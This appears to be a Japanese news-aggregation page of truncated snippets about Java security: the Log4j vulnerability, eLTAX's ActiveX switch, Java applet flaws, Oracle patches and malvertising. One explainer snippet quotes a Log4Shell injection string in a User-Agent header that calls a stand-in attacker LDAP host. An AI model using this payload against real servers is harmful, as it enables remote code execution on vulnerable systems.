「Log4j」脆弱性の攻撃数、警察庁がリアルタイム公開
世界的に問題になっている「Apache Log4j」の脆弱性について、警察庁が12月14日、全国の警察施設のセンサーで観測した攻撃数のグラフを公開した。 警察施設のインターネット接続点に設置したセンサーで、脆弱性をついた攻撃のアクセスを観測。1センサー当たりの平均の推移をグラフに示した。1時間ごとに更新している。 Apache Log4jは、Javaで使われるログ出力ライブラリ。多数の企業向けシステムに採用されている。 脆弱性は12月9日(米国時間)に判明。悪意のある文字列を記録させることで、任意のリモートコードを実行できるというもので、ハッキングに悪用されるリスクがある。 警察庁のセンサーでも、日本時間10日から攻撃を観測。1日当たりの攻撃数推移をポート別に示した棒グラフを14日に公開し、警戒を呼び掛けた。 米国土安全保障省(DHS)傘下のサイバーセキュリティ諮問機関・CISAは14日、
【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を
Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog
2021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」の2.x系バージョン(以降はLog4j2と記載)で確認された深刻な脆弱性を修正したバージョンが公開されました。セキュリティ関係組織では過去話題になったHeartbleedやShellshockと同レベルの脆弱性とも評価しています。ここでは関連する情報をまとめます。 1.何が起きたの? Javaベースのログ出力ライブラリLog4j2で深刻な脆弱性(CVE-2021-44228)を修正したバージョンが公開された。その後も修正が不完全であったことなどを理由に2件の脆弱性が修正された。 広く利用されているライブラリであるため影響を受ける対象が多く存在するとみられ、攻撃が容易であることから2014年のHeartbleed、Shellshock以来の危険性があるとみる向きもあり、The Apache Software
Java 8でも安心。Dockerに対するCPU・メモリ対応。(2018年11月現在) - Mitsuyuki.Shiiba
8u191でDocker対応がバックポートされたので、頭の整理と確認をしておいた。 ## まとめ Java 11使っておけばそもそも安心なんだけど、Java 8でも8u191以降を使えば安心。 ## 課題だったこと DockerでJavaを動かすときJavaが「そのコンテナに割り当てられたCPU・メモリ」じゃなくて「Dockerが動いてるHostのCPU・メモリ」を見てしまうことが課題だった。 ## Java 10以降 Java 10以降なら「そのコンテナに割り当てられたCPU・メモリ」を見る対応が入ってるから安心になった。 https://www.oracle.com/technetwork/java/javase/10-relnote-issues-4108729.html#JDK-8146115 ## Java 8は? Java 8で入ってた対応は8u131のこれ: Bug ID:
地方税ポータル「eLTAX」はなぜActiveXを採用したのか、地方税電子化協議会に聞いた
~eLTAXをお使いの皆様へ~ Java実行環境が不要になります (中略) ※電子署名を付与する場合に、ActiveXコントロールのインストールが必要です 地方税電子化協議会が運営する地方税電子申告システム「eLTAX(エルタックス)」のWebサイト上で2016年3月3日に掲載された案内(PDF)が、IT技術者の間で波紋を呼んでいる。 eLTAXではこれまで、Web上で利用届出や申請などを行う際の電子署名を、Javaアプレットで実行していた。だが、Java実行環境(JRE)の更新に伴うJavaアプレットの動作確認が間に合わず、旧バージョンのJREのインストールを利用者に求めることがたびたびあった。 eLTAXでは、2016年3月14日からJREに代わり、動作確認が不要なActiveXを採用。このとき掲載した利用案内では、Internet Explorer(IE)設定で「署名済みActive
追記(19日)東洋経済オンラインの的外れ記事 / 高木浩光@自宅の日記 - 治外法権のeLTAX、マルウェア幇助を繰り返す無能業者は責任追及されて廃業に追い込まれよ
■ 治外法権のeLTAX、マルウェア幇助を繰り返す無能業者は責任追及されて廃業に追い込まれよ ここ数年、不正送金の被害がインターネットバンキングの法人口座で急増しているという*1。その原因は今更言うまでもなく、Java実行環境(JRE)やAdobe製品の古いバージョンの脆弱性を突いてくるマルウェアである。しかしそれにしても、法人口座を扱うパソコンがなぜ、Java実行環境やAdobe製品をインストールしているのだろうか。インストールしなければ被害も起きないのに……。 その謎を解く鍵が、eLTAX(地方税ポータルシステム)にあるようだ。eLTAXでは、インターネットバンキングの口座を用いた納税ができることから、インターネットバンキング用のパソコンでeLTAXの利用環境も整えるということが普通になっていると思われる。そのeLTAXが、昨日までは、Java実行環境のインストールを強要していた。eL
[IT 管理者向け] 古いバージョンの ActiveX コントロールをブロックする機能 | MSRC Blog | Microsoft Security Response Center
This blog post is older than a year. The information provided below may be outdated. 2015 年 2 月 12 日追記 古いバージョンの ActiveX コントロールの利用をブロックする機能について、情報サイト Blocked out-of-date ActiveX controls(英語情報)を開設いたしました。 および今後追加されるブロックされる ActiveX コントロールのリストは、Blocked out-of-date ActiveX controls(英語情報)で告知を行いますのでご参照ください。 -————————————————— 8 月 13 日に公開されたマイクロソフト セキュリティ情報 MS14-051 のInternet Explorer 用の累積的なセキュリティ更新プログラム 2
JavaサイトにJavaの脆弱性を悪用する不正広告、マルウェア感染の恐れ
「java.com」などの大手サイトに、ユーザーをマルウェアに感染させる不正な広告が配信されていたという。 Javaプラグイン配布の公式サイト「java.com」にJavaの脆弱性を悪用する広告が表示され、ユーザーをマルウェアに感染させていたことが分かった。セキュリティ企業のFox-ITが8月27日のブログで伝えた。 Fox-ITは同社のサービスを通じ、8月19日~22日にかけて複数の大手サイトに、ユーザーをマルウェアに感染させる不正な広告が配信されているのを発見したという。不正な広告はJava.comのほか、TMZ.com、Photobucket.com、eBay.ieなどの大手サイトに配信されていた。 問題の広告には脆弱性悪用キットの「Angler」が仕込まれていて、ユーザーのコンピュータ上にJava、Flash、Silverlightの古いバージョンが見つかると、その脆弱性を突くマル
Java 7のWindows XP対応は当面継続、Oracleが表明
米Microsoftがサポートを打ち切ったWindows XPへのJavaの対応について、Oracle幹部が7月11日のブログで、当面の間はWindows XP向けにもJava 7のアップデート配信を続けると表明した。 同社Javaプラットフォーム部門幹部のヘンリック・スタール氏によると、MicrosoftのWindows XPサポート終了を受けて、OracleもWindows XP上でのJavaの公式サポートを終了すると表明していた。しかし、これは「Oracleとサポート契約を結んでいる顧客がWindows XPで問題に遭遇した場合は、それ以降のバージョンのWindowsで問題を再現する必要がある。もしそれがWindows XP特有の問題だった場合、Oracleにパッチを提供する義務はない(提供できない)」という意味だったという。 JDK 7は今後も引き続きWindows XPに対応する
Oracleが定例アップデートを予告、Javaに極めて深刻な脆弱性
アップデートは米国時間の7月15日に公開予定。計115件の脆弱性のうち、20件をJava SEの脆弱性が占める。 米Oracleは、定例の「クリティカルパッチアップデート」を米国時間の7月15日に公開し、Javaやデータベースなどに存在する深刻な脆弱性を修正すると予告した。 同社が10日に公表した概略によると、今回のアップデートでは計115件の脆弱性を修正する。このうち20件をJava SEの脆弱性が占める。20件とも、ネットワークを介して認証を経ることなくリモートから悪用される恐れがあるといい、共通指標のCVSSで最高値の10.0に該当する極めて深刻な脆弱性も含まれる。 Java SEのほかにも、Oracle Database ServerやFusion Middleware、PeopleSoftやSiebel、Sun Systemsなどの製品、Oracle Virtualization
Oracle Java SE Critical Patch Update Advisory - April 2013
Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. The Critical Patch Update for Java SE also includes non-security fixes. Critical Patch Updates are cumulative and each advisory describes only the security fixes added since the previous Critical Patch Update and Security Alert. Thus, prior Critical Patch Update and Security Alert advisories shoul
Javaってそもそも何なのか? セキュリティー対策としての「無効」設定 | ライフハッカー・ジャパン
ライフハッカー編集部さま 毎度のことですが、Javaにまたセキュリティーホールが見つかったようですね。そこでちゃんと知っておきたいのです。そもそもJavaって何なのですか? JavaScriptと同じものですか? 無効にした方がいいのですか? 哀れなプラグイン(Pitiful Plugins)より 哀れなプラグインさんへ 本当に頭の痛くなる問題ですよね。でもご安心を。そもそもJavaはほとんどの人にとって必要ないものです。Javaが何をしているかを説明し、問題点とその解決法をご紹介しましょう。Javaとは何か? Javaとは、コンピューター上のアプリケーションを作るときに使われるプログラミング言語です。おそらく誰もが、Javaランタイムの必要なソフトウエアをダウンロードした経験があるはず。お手持ちのシステムにはすでにインストールされていると思います。Javaには、こうしたソフトウエアをブラ
「JavaはGoogleへ売却すべき」――脆弱性放置のOracleに忠告
企業が手にできる最悪の保証といえば、政府によるソフトウェア使用禁止令だろう。2013年1月10日(米国時間)、米Oracleに起きたことは、まさにそれだった。米国土安全保障省(DHS)が、全てのコンピュータユーザーに対して、重大な脆弱性があることを理由に、クライアントPCのJavaを無効にすべきだと警告したのだ。 関連記事 米Oracleの怠慢を批判――「Javaはアンインストールすべき」 検出不可? Javaの脆弱性を突く「ファイルなしボット」 Javaをアンインストールせずにセキュリティを高める方法 「Java 7 Update 10」に、「Red October」というグローバルマルウェアネットワークへ接続する重大な脆弱性悪用プログラム(エクスプロイト)が見つかった。そのエクスプロイトは、世界中の政府系機関にある数百台のクライアントPCに侵入し、数カ月間にわたって活動していた。 Or
Javaにまたも未解決の脆弱性か、セキュリティ企業がOracleに通報
過去に何度もJavaの脆弱性を発見してきたセキュリティ企業が、新たに2件の脆弱性に関する情報をOracleに提供したことを明らかにした。 ポーランドのセキュリティ企業Security Explorationsは2月25日、2件の脆弱性に関する情報とコンセプト実証コードをOracleに提供したことを明らかにした。Oracleは提供された情報について調査した上で返答すると伝えてきたという。 Security Explorationsは、過去に何度もJavaの脆弱性を発見してきたセキュリティ企業。メディア各社はこの脆弱性について、Oracleが2月19日に公開したばかりのJava最新版「Java 7 Update 15」が影響を受けると伝えている。 JavaはOSを問わないマルチプラットフォーム対応の特性を利用して、WindowsとMacの両方を狙った攻撃に利用されるケースが急増している。最近で
「Java 7 Update 11でも脆弱性は残っているから引き続きJava無効化を」という話について
「Java SE 7 Update 11 でもバグが修正されていない」という専門家の意見が書いてあるロイター通信の記事(Oracle updates Java, security expert says it still has bugs)をTwitterで紹介しましたが、「やはり修正されていない」「修正されたのは2つの脆弱性の内の一つだけ」というニュース記事が複数出てきました。 これらのニュース記事には、「Java 7 Update 11でも脆弱性は残っているから、Java(Java appletを起動するためのブラウザ上のJavaプラグイン)をひきつづき無効化せよ」という内容のCERTの意見が掲載されています(無効化手順はこちら)。 しかし、日本語の記事が曖昧で、少し情報源のページを読んでみると、単に「片方が修正されていないから危険」というわけではない、ちょっとややこしい話のようだった
Oracle、Java 7 Update 11を公開 脆弱性に対処
米Oracleは1月13日(現地時間)、1月10日に発覚した「Java 7 Update 10」の深刻な脆弱性に対処したアップデート「Java 7 Update 11」を公開した。JavaコントロールパネルあるいはOracleのWebサイトからダウンロードできる。 この脆弱性を利用した攻撃の発生がセキュリティ各社から報告され、脆弱性に関する詳しい情報もインターネットで出回っていることから、Oracleではできるだけ早くこのアップデートを適用するよう、強く推奨している。 リリースノートによると、2つの脆弱性に対処した他、Javaコントロールパネルでのセキュリティレベルの初期設定を「中(M)」から「高(H)」に変更した。これにより、ユーザーが無署名のJavaアプレットなどを起動しようとすると、必ず警告が表示されるようになる。
各種ブラウザーで Java (applet) を無効にする方法
こちら(米国)では、見つかった Java のセキュリティホール(+それを利用した実際のアタック)が大問題になり、米国政府が「ただちに Java を無効にするように」と声明を出し(参照)、全国ニュースでも大きく取り上げられている。 実質的な危険があるのは Java applet なのだが、Java と Java applet の違いの分からない報道機関は、大々的に「Java が危険」と報道しており、Sun Microsystems を買収して Java を入手した Oracle にとっては大きなブランドイメージの損失だ。Oracle は火曜日には56カ所のセキュリティホールを塞いだパッチを提供するそうだが、そんなパッチでは、今回作られてしまった「Java は危ない」というイメージは拭えない。 どのみち、Java applet にはほとんど価値がないので、これを機会に無効にする人も多いようだ(
Oracle Java SE JDKおよびJREのRhinoスクリプトエンジンの脆弱性(CVE-2011-3544)に関する検証レポート
Oracle Java SE JDKおよびJREのRhinoスクリプトエンジンの脆弱性(CVE-2011-3544)に関する検証レポート Tweet 2011/12/02 NTTデータ先端技術株式会社 辻 伸弘 渡邊 尚道 小田切 秀曉 【概要】 Oracle Java SE のJDKおよびJREに、Rhinoスクリプトエンジンによる、任意のコードが実行可能な脆弱性(CVE-2011-3544)が存在することが発見されました。この脆弱性は、Java内に組み込まれたJavaScriptエンジンがJavaScriptエラーオブジェクトを適切に処理しません。 この脆弱性により、細工されたWebページの閲覧などで、使用したWebブラウザの実行ユーザ権限と同じ権限が奪取される危険性があります。 想定される被害としては、奪取されたユーザ権限による情報取得、改ざん、または、ワームやスパイウェアなどの悪意
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
「Java 7 Update 17」公開、既に悪用が確認されている脆弱性を修正 
TechCrunch
